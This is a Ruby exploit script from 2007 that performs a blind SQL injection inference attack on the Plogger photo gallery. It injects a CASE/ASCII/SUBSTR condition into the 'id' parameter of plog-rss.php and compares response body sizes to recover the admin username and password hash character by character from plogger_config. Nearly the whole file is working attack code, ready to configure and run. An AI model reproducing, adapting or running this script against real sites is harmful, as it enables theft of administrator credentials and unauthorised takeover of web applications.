#!/usr/bin/ruby
=begin
**
** plogger_inference.rb
** 15/OCT/2007
** ETD-Software
**  - Daniel Martin Gomez <etd[-at-]nomejortu.com>
**
** Desc:
**  dictionary based SQL injection inference attack agains Plogger 
**
** Version:
**  v1.0 [15/Oct/2007]: first released
**
**  This program is free software: you can redistribute it and/or modify
**  it under the terms of the GNU General Public License as published by
**  the Free Software Foundation, either version 2 of the License, or
**  (at your option) any later version.
**
**  This program is distributed in the hope that it will be useful,
**  but WITHOUT ANY WARRANTY; without even the implied warranty of
**  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
**  GNU General Public License for more details.
**
**  You should have received a copy of the GNU General Public License
**  along with this program.  If not, see <http://www.gnu.org/licenses/>.
=end

require 'cgi'
require 'net/http'

# configure the parameters of the target system
$host = 'localhost'
$path = '/gallery/plog-rss.php?level=collection&id=1'

$body_size_success = 967
$body_size_failure = 322

# configure the parameters of the fields whose values we want to infer
$fields = ['admin_username', 'admin_password']
$field_length = [5, 32]
$dictionaries = ['admin', '0123456789abcdef']

# define the SQL string we will be using to actually perform the attack
$sql = CGI::escape(' AND 1=(SELECT CASE WHEN (ASCII(SUBSTR(FIELD,POSITION,1))=TEST_VALUE) THEN 1 ELSE 0 END FROM plogger_config)')

$results = []

http = Net::HTTP.new($host)

# for each field, from position 1 to that defined in $field_length, iterate 
# through the different values of our dictionary and send the SQL query.
$fields.each do |field|
  dict = $dictionaries.shift
  size = $field_length.shift
  inferred = ''
  puts "Inferring #{field}"
  puts '=================='
  sql1 = $sql.sub(/FIELD/,field)
  (1..size).each do |i|
    print "\tPosition #{i}: "
    sql = sql1.sub(/POSITION/,i.to_s)
    (0..(dict.size-1)).each do |j|
      value = dict[j]
      resp = http.get($path + sql.sub(/TEST_VALUE/, value.to_s))

      # a particular iteration is successful if the size of the body obtained
      # matches the value we expect
      if (resp.body.size == $body_size_success)
        puts value.chr
        inferred << value.chr
        break
      end
    end
  end
  puts "\tInferred value: #{inferred}"
  $results << inferred
end